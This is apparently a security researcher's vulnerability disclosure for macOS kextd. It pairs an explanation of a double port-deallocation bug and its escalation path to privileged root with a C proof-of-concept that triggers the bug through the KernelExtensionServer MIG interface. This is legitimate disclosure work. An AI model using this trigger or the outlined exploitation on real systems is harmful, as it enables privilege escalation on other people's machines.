// MacOS double mach_port_deallocate in kextd due to failure to comply with MIG ownership rules
// ianbeer
#if 0
Here's a kextd method exposed via MIG (com.apple.KernelExtensionServer)

	kern_return_t _kextmanager_unlock_kextload(
			mach_port_t server,
			mach_port_t client)
	{
			kern_return_t mig_result = KERN_FAILURE;
			
			if (gClientUID != 0) {
					OSKextLog(/* kext */ NULL,
							kOSKextLogErrorLevel | kOSKextLogIPCFlag,
							"Non-root kextutil doesn't need to lock/unlock.");
					mig_result = KERN_SUCCESS;
					goto finish;
			}
			
			if (client != (mach_port_t)dispatch_source_get_handle(_gKextutilLock)) {
					OSKextLog(/* kext */ NULL,
							kOSKextLogErrorLevel | kOSKextLogIPCFlag,
							"%d not used to lock for kextutil.", client);
					goto finish;
			}

			removeKextutilLock();
			
			mig_result = KERN_SUCCESS;
			
	finish:    
			// we don't need the extra send right added by MiG
			mach_port_deallocate(mach_task_self(), client);
			
			return mig_result;
	}

If the client has UID 0 but passes an invalid client port this code will
drop a UREF on client port then return KERN_FAILURE.

Returning KERN_FAILURE in MIG means all resources will be released which will
cause client to be passed to mach_port_deallocate again, even though only 
one UREF was taken.

You'll have to use a debugger attached to kextd to see this behaviour.

This class of bug is exploitable; please see the writeup for mach_portal from 2016
where I exploited a similar issue [https://bugs.chromium.org/p/project-zero/issues/detail?id=959]
The TL;DR is that an attacker can drop an extra UREF on any send rights in kextd for which the
attacker also has a send right; you could use this to cause a name for a privileged service
to be deallocated then cause the name to be reused to name a port you control.

Exploitation of this would be a privesc from unentitled root to root with
com.apple.rootless.kext-management and com.apple.rootless.storage.KernelExtensionManagement entitlements,
which at least last time I looked was equal to kernel code execution.

tested on MacOS 10.13.2
#endif


#include <stdlib.h>
#include <stdio.h>

#include <servers/bootstrap.h>
#include <mach/mach.h>

#include "kextmanager.h"

int main() {
  mach_port_t kextd_port = MACH_PORT_NULL;
  mach_port_t bootstrap_port = MACH_PORT_NULL;

  task_get_bootstrap_port(mach_task_self(), &bootstrap_port);
  bootstrap_look_up(bootstrap_port, "com.apple.KernelExtensionServer", &kextd_port);
  
  if (kextd_port == MACH_PORT_NULL) {
    printf("couldn't get the kextd port\n");
    return EXIT_FAILURE;
  }

  printf("got port\n");

  kern_return_t err;
  mach_port_t not_a_lock = MACH_PORT_NULL;
  err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &not_a_lock);
  if (err != KERN_SUCCESS) {
    printf("failed to allocate fake lock port\n");
    return 0;
  }
  printf("fake lock local name: 0x%x\n", not_a_lock);

  mach_port_t a_lock = MACH_PORT_NULL;
  err = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &a_lock);
  if (err != KERN_SUCCESS) {
    printf("failed to allocate actual lock port\n");
    return 0;
  }
  printf("lock local name: 0x%x\n", a_lock);
  // need to call lock first so it actually allocates the dispatch queue, otherwise hit a null-ptr deref...
  kern_return_t res;
  int out = 0;
  res = kextmanager_lock_kextload(kextd_port, a_lock, &out);
  
  res = kextmanager_unlock_kextload(kextd_port, not_a_lock);

  return EXIT_SUCCESS;
}
